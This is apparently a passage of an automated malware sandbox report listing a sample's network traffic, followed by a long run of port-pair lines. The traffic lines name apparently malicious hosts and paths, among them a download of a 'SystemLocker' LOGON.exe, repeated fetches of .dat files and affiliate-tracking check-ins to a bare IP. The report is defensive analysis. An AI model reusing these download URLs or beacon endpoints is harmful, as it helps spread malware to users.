          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /sw/l.php?aff_id=1&wm_id=46&u=4d79e664-726f-48c9-9669-374112d48b6d&log_id=16&os=6.2.9200.256.1.9. HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 78.159.97.210Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/UNLOCKKEYS/LOGON.exe HTTP/1.1Host: arizonacode.bplaced.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /sw/l.php?aff_id=1&wm_id=46&u=5e4ec3dc-28c4-4007-bc6e-6b2c6debcd29&log_id=12&os=10.0.17134.256.1.9. HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 78.159.97.210Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /scripts/status.php?action=renew&id=0 HTTP/1.1Host: www.vikingwebscanner.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/UNLOCKKEYS/LOGON.exe HTTP/1.1Host: arizonacode.bplaced.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /scripts/status.php?action=renew&id=0 HTTP/1.1Host: www.vikingwebscanner.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /themes/prestashop/cache/stats.php HTTP/1.1Host: powertoolsforyou.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /themes/prestashop/cache/stats.php HTTP/1.1Host: powertoolsforyou.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/UNLOCKKEYS/LOGON.exe HTTP/1.1Host: arizonacode.bplaced.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49680
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
          Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
